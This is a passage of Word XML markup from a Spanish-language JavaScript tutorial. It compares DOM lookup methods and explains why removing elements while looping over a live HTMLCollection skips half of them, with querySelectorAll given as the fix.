                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Element</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>: si no, un día tu código va a andar con el HTML minificado y a fallar con el indentado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30ADECAD" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc239319983"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.5 — Cómo se buscan los nodos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="1B5D69AA" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc239319984"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.5.1 — Los métodos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3009"/>
        <w:gridCol w:w="3004"/>
        <w:gridCol w:w="3003"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="1F67D34B"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9AB56CD" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Método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D2DF194" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Devuelve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699A551" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Notas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="0D5F3340"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D21A6EE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>getElementById(id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3F0DEBA0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Un elemento o </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="14153A03" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>El más rápido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="76D818E0"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83DCD88" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>querySelector(sel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1602A57D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">El </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>primer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> coincidente o </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E936008" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Acepta cualquier selector CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="14935DD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B3F40E2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>querySelectorAll(sel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="24A91384" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Una lista </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>estática</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="055E7AA2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>La opción por defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="53D3277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484A5EC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>getElementsByClassName(c)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1FDE493F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Una colección </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>viva</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2DACA8C4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Ver 4.5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="6998F4E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69EE0C4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>getElementsByTagName(t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7821B0CB" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Una colección </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>viva</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3F8843AC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Ver 4.5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BF900F7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Los dos primeros aceptan los mismos selectores del Capítulo 2, y podés invocarlos sobre cualquier elemento —no sólo sobre </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>— para buscar en su subárbol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA6C78B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc239319985"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>El detalle que te ahorra media hora</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="3B41E1BC" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuando no hay coincidencia, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>querySelector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> devuelve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>: no lanza una excepción.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> El error aparece después, al usar el resultado, con un mensaje que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no menciona el selector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> —el famoso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Cannot read properties of null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">—, y su causa casi siempre es que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>el elemento todavía no existía cuando tu script corrió</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>: el problema de la sección 3.3, que los módulos resuelven porque corren después del parseo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697DB2A6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc239319986"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>4.5.2 — Colecciones vivas y listas estáticas: el bug que funciona a medias</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="163B83D7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Acá está la trampa que produce la segunda decisión de diseño de 4.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043D9A6A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>querySelectorAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> devuelve una lista </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>estática</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, una foto del momento en que la consultaste; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>getElementsByClassName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>getElementsByTagName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, colecciones </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>vivas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se actualizan solas cuando el documento cambia. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Una colección viva es el tablero de llegadas del aeropuerto; una lista estática, la foto que le sacaste.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> La diferencia es invisible hasta que modificás el DOM mientras recorrés la colección:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5976AD" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>const items = document.getElementsByClassName("item-carrito");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652A9E17" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>for (let i = 0; i &lt; items.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFFD0FE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  items[i].remove();     // al quitar uno, la colección se acorta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270164AF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B806131" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>// Resultado: quedan la mitad de los elementos sin quitar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071D89EB" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Eliminás el elemento </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">; el que era </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> pasa a ser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, pero tu índice ya avanzó a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">: te salteaste uno. Y como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> se acortó, el bucle termina antes. La solución es una lista estática, o convertir la colección a arreglo antes de recorrerla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1340AC41" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>document.querySelectorAll(".item-carrito").forEach(el =&gt; el.remove());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3CB39164" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDECEA" w:fill="FDECEA"/>
          </w:tcPr>
          <w:p w14:paraId="331CEFB6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>OJO ACÁ: el bug que funciona a medias</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7824F87F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Este bug es de los peores, y te digo por qué: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>funciona a medias.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> No falla con un error prolijo que puedas buscar: borra la mitad de los elementos, y vos mirás el código veinte minutos sin entender nada.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D5E291B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Es la fila del banco: anotaste que el trámite difícil es el de la tercera persona; se van los dos primeros, todos corren un lugar, y tu número tres apunta a otra.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="605BCC25" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">La regla no tiene excepciones prácticas: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">usá </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>querySelectorAll</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> y listo.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>getElementsByClassName</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> sólo sirve si querés la colección viva </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>a propósito</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>. Si no sabés que la querés viva, no la querés viva.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FDD7D06" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc239319987"/>
      <w:r>
